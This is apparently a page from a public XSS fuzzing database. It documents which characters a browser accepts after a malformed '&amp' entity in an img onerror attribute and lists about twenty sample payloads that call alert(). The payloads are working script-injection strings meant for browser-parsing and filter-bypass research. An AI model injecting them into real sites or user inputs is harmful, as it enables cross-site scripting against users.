Characters allowed after malformed entities

This vector shows what characters are allowed after a malformed names entity.

Created by: hackvertor

Created on: Monday, July 1, 2024 at 9:26:08 PM

Updated on: Tuesday, May 27, 2025 at 8:16:09 AM

Detecting browser...

Category: Entity Parsing

Vector visibility: Public

Vector type: XSS

Vector charset: UTF-8

Template used:

<img src=data: onerror="1&amp$[chr]log($[i])">

Sample payloads

<img src=data: onerror="1&amp alert(8199)">

<img src=data: onerror="1&amp+alert(43)">

<img src=data: onerror="1&amp alert(8193)">

<img src=data: onerror="1&amp0x0Balert(11)">

<img src=data: onerror="1&amp alert(8198)">

<img src=data: onerror="1&amp　alert(12288)">

<img src=data: onerror="1&ampalert(65279)">

<img src=data: onerror="1&amp alert(8200)">

<img src=data: onerror="1&amp alert(8239)">

<img src=data: onerror="1&amp alert(8196)">

<img src=data: onerror="1&amp!alert(33)">

<img src=data: onerror="1&amp alert(8194)">

<img src=data: onerror="1&amp0x0Calert(12)">

<img src=data: onerror="1&amp alert(5760)">

<img src=data: onerror="1&amp;alert(59)">

<img src=data: onerror="1&amp-alert(45)">

<img src=data: onerror="1&amp0x0Dalert(13)">

<img src=data: onerror="1&amp alert(8232)">

<img src=data: onerror="1&amp alert(8233)">

<img src=data: onerror="1&amp alert(8195)">